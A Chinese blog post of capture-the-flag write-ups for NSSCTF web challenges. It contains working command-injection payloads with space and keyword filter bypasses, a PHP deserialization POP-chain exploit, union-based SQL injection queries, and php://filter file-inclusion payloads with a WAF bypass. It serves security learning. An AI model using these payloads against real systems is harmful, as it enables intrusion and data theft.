<h2 id="gxyctf-2019ping-ping-ping"><a class="markdownIt-Anchor" href="#gxyctf-2019ping-ping-ping">#</a> [GXYCTF 2019]Ping Ping Ping</h2>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b13.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b13.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>他说 why not try <a target="_blank" rel="noopener" href="http://bjut.edu.xn--cnbjut-4l2j812eefal299bdvif9c.edu.cn">bjut.edu.cn 那就尝试输入 bjut.edu.cn</a></p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b14.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b14.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>回显内容长这样</p>
<p>上面有个问句 php 可以执行系统函数？那就尝试使用系统函数例如 ls 等</p>
<p>输入 1;ls</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b15.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b15.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>得到有 index.php 和 flag.php</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b16.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b16.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>空格被过滤了，那就用 $IFS$1 来替代空格</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=1;cat$IFS$1index.php</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b17.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b17.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>查看源代码</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b18.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b18.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>可以看到被过滤的字符</p>
<blockquote>
<p>做一些记录：</p>
<p>第一个 if 里的 \x 是 16 进制字符开头</p>
<p>第二个 if 匹配的是空格</p>
<p>第三个是 bash</p>
<p>第四个是 flag。 <code>.</code>  是匹配一个不是 <code>\n</code>  的字符， <code>*</code>  是前一个匹配符匹配 0 到无数次。就是一个字符串里面 flag 这四个字符不能顺序出现在任意位置中，不管中间间隔了什么，他们连起来就是 flag，就会输出 die (“fxck your flag!”);</p>
</blockquote>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=1;a=ag;b=fl;cat$IFS$1$b$a.php</span><br></pre></td></tr></table></figure>
<p>然后查看网页源代码</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b19.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b19.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p 9a6ece93-3ef0-4a23-bf5e-4585f4fce12e>NSSCTF</p>
<h2 id="swpuctf-2021-新生赛pop"><a class="markdownIt-Anchor" href="#swpuctf-2021-新生赛pop">#</a> [SWPUCTF 2021 新生赛] pop</h2>
<p>题目：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="string">&quot;index.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">w44m</span></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$admin</span> = <span class="string">&#x27;aaa&#x27;</span>;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$passwd</span> = <span class="string">&#x27;123456&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">Getflag</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;admin === <span class="string">&#x27;w44m&#x27;</span> &amp;&amp; <span class="variable language_">$this</span>-&gt;passwd ===<span class="string">&#x27;08067&#x27;</span>)&#123;</span><br><span class="line">            <span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;admin;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;passwd;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;nono&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">w22m</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$w00m</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;w00m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">w33m</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$w00m</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$w22m</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;w00m-&gt;&#123;<span class="variable language_">$this</span>-&gt;w22m&#125;();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$w00m</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;w00m&#x27;</span>];</span><br><span class="line"><span class="title function_ invoke__">unserialize</span>(<span class="variable">$w00m</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>还没完全 get 到 pop 链的做法，还是多刷点题慢慢体会吧</p>
<p>exp:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">w44m</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$admin</span> = <span class="string">&#x27;w44m&#x27;</span>;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$passwd</span> = <span class="string">&#x27;08067&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">w22m</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$w00m</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;w00m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">w33m</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$w00m</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$w22m</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;w00m-&gt;&#123;<span class="variable language_">$this</span>-&gt;w22m&#125;();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">w22m</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;w00m = <span class="keyword">new</span> <span class="title function_ invoke__">w33m</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;w00m-&gt;w00m = <span class="keyword">new</span> <span class="title function_ invoke__">w44m</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;w00m-&gt;w22m = <span class="string">&#x27;Getflag&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b20.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b20.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p fa1ded52-88f2-4369-bcd4-ddbde5defb83>NSSCTF</p>
<p>这里再记录一下魔术方法，加深一下印象</p>
<blockquote>
<p>__sleep () // 使用 serialize 时触发</p>
<p>__destruct () // 对象被销毁时触发</p>
<p>__call () // 在对象上下文中调用不可访问的方法时触发</p>
<p>__callStatic () // 在静态上下文中调用不可访问的方法时触发</p>
<p>__get () // 用于从不可访问的属性读取数据</p>
<p>__set () // 用于将数据写入不可访问的属性</p>
<p>__isset () // 在不可访问的属性上调用 isset () 或 empty () 触发</p>
<p>__unset () // 在不可访问的属性上使用 unset () 时触发</p>
<p>__toString () // 把类当作字符串使用时触发</p>
<p>__invoke () // 当脚本尝试将对象调用为函数时触发</p>
</blockquote>
<h2 id="litctf-2023ping"><a class="markdownIt-Anchor" href="#litctf-2023ping">#</a> [LitCTF 2023]Ping</h2>
<p>输入 127.0.0.1;ls</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b21.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b21.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>前端？？？直接禁用 JavaScript 再次尝试</p>
<p>禁用完就可以了</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b22.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b22.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>直接 127.0.0.1;cat /flag</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b23.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b23.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p 945f7b8a-f706-43ec-8ae0-0eccc40f135d>NSSCTF</p>
<h2 id="swpuctf-2021-新生赛sql"><a class="markdownIt-Anchor" href="#swpuctf-2021-新生赛sql">#</a> [SWPUCTF 2021 新生赛] sql</h2>
<p>网页提示参数是 wllm，wllm=1 有回显 name 和 password</p>
<p>wllm=1’</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the  manual that corresponds to your MariaDB server version for the right  syntax to use near &#x27;&#x27;1&#x27;&#x27; LIMIT 0,1&#x27; at line 1</span><br></pre></td></tr></table></figure>
<p>闭合单引号</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b24.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b24.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>存在过滤？用 <code>?wllm=1'%23</code>  就回显正常了</p>
<p>尝试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27; or 1=1%23</span><br></pre></td></tr></table></figure>
<p>发现是非法操作，可能是空格被过滤了，把空格替换成 /**/ 或者 +</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?wllm=1&#x27;/**/order/**/by/**/3%23	#回显正常</span><br><span class="line">?wllm=1&#x27;/**/order/**/by/**/4%23	#Unknown column &#x27;4&#x27; in &#x27;order clause&#x27;</span><br></pre></td></tr></table></figure>
<p>联合注入 union select 查找回显位置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;/**/union/**/select/**/1,2,3%23</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b25.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b25.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>查找当前数据库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;/**/union/**/select/**/1,2,database()%23</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b26.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b26.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>查找当前数据库所有表名，等于号换成单词 like</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b27.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b27.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>爆字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()%23</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b28.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b28.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>获取 flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b29.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b29.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>只有半截，搭配着 substr 来获取 flag，本题 substr 好像被过滤了，用 mid 函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;/**/union/**/select/**/1,2,mid(group_concat(flag),20,20)/**/from/**/LTLT_flag%23</span><br><span class="line">?wllm=-1&#x27;/**/union/**/select/**/1,2,mid(group_concat(flag),30,20)/**/from/**/LTLT_flag%23</span><br></pre></td></tr></table></figure>
<p><img src alt><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b30.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b30.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="b30"></p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b31.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b31.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<h2 id="swpuctf-2021-新生赛finalrce"><a class="markdownIt-Anchor" href="#swpuctf-2021-新生赛finalrce">#</a> [SWPUCTF 2021 新生赛] finalrce</h2>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b32.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b32.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>网上查了，本题用的是 linux 里 tee 命令，记录一下</p>
<blockquote>
<p>tee 将想要执行的命令写入到一个文件里面，然后再去访问这个文件，以此来执行这个命令。</p>
</blockquote>
<p>本题 ls 被禁用了，|\s 可以替代 ls，| 是执行以下命令的意思</p>
<p>这里尝试获取目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=l\s / | tee 1.txt</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b33.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b33.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>获取 flllllaaaaaaggggggg 里的内容</p>
<p>本题禁用了 cat 但是没有禁用 tac，tac 就是 cat 反过来，反向读取文件，把文件的最后一行放在第一行</p>
<p>因为禁用了 la，所以在 l 和 a 之间加一个 \，不然就没有办法绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=tac /flllll\aaaaaaggggggg | tee 2.txt</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b34.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b34.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>得到 flag</p>
<h2 id="swpuctf-2022-新生赛ez_ez_php"><a class="markdownIt-Anchor" href="#swpuctf-2022-新生赛ez_ez_php">#</a> [SWPUCTF 2022 新生赛] ez_ez_php</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b35.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b35.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>删去.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=php://filter/read=convert.base64-encode/resource=flag</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b36.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b36.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b37.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b37.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p 01381eab-bbcb-4599-a525-be5dc8ab300f>NSSCTF</p>
<h2 id="鹏城杯-2022简单包含"><a class="markdownIt-Anchor" href="#鹏城杯-2022简单包含">#</a> [鹏城杯 2022] 简单包含</h2>
<p>POST <code>flag=/var/www/html/flag.php</code></p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b38.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b38.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>触发 waf，这里简要记录一下 waf</p>
<blockquote>
<p>WAF 全称叫 Web Application Firewall，和传统防火墙的区别是，它是工作在应用层的防火墙，主要对 web 请求 / 响应进行防护。</p>
<p>Web 应用防火墙可以防止 web 应用免受各种常见攻击，如 SQL 注入，跨站脚本漏洞 XSS 等。WAF 也能够监测并过滤掉某些可以让应用遭受 DOS（拒绝服务）攻击的流量。WAF 会在 HTTP 流量抵达应用服务器之前检测可疑访问，同时，他们也能防止从 web 应用获取某些未经授权的数据。</p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b39.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b39.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
</blockquote>
<p>这里尝试一下 php 伪协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>
<p>还是触发 waf，那读取一下 index.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag=php://filter/read=convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b40-17060128515931.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b40-17060128515931.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$path = $_POST[&quot;flag&quot;];</span><br><span class="line"></span><br><span class="line">if (strlen(file_get_contents(&#x27;php://input&#x27;)) &lt; 800 &amp;&amp; preg_match(&#x27;/flag/&#x27;, $path)) &#123;</span><br><span class="line">    echo &#x27;nssctf waf!&#x27;;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    @include($path);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;code&gt;&lt;span style=&quot;color: #000000&quot;&gt;</span><br><span class="line">&lt;span style=&quot;color: #0000BB&quot;&gt;&amp;lt;?php&amp;nbsp;&lt;br /&gt;highlight_file&lt;/span&gt;&lt;span style=&quot;color: #007700&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #0000BB&quot;&gt;__FILE__&lt;/span&gt;&lt;span style=&quot;color: #007700&quot;&gt;);&lt;br /&gt;include(&lt;/span&gt;&lt;span style=&quot;color: #0000BB&quot;&gt;$_POST&lt;/span&gt;&lt;span style=&quot;color: #007700&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #DD0000&quot;&gt;&quot;flag&quot;&lt;/span&gt;&lt;span style=&quot;color: #007700&quot;&gt;]);&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: #FF8000&quot;&gt;//flag&amp;nbsp;in&amp;nbsp;/var/www/html/flag.php;&lt;/span&gt;</span><br><span class="line">&lt;/span&gt;</span><br><span class="line">&lt;/code&gt;&lt;br /&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>flag 被过滤了，但是这个 if 条件有个很明显的绕过，&amp;&amp; 说明要同时满足两个条件，而且第一个条件是字数 &lt; 800 的条件，只要超过就不满足条件，就可以获取 flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=a....(800个a)&amp;flag=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b41.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b41.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p><img src="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b42.png" class="lazyload" data-srcset="/2024/01/20/NSSCTF%E5%88%B7%E9%A2%982/b42.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p 8fa94955-8ac7-46d7-9b24-05b56bd0d2d1>NSSCTF</p>

<div class="article-footer fs14">
    <section id="license">
      <div class="header"><span>License</span></div>
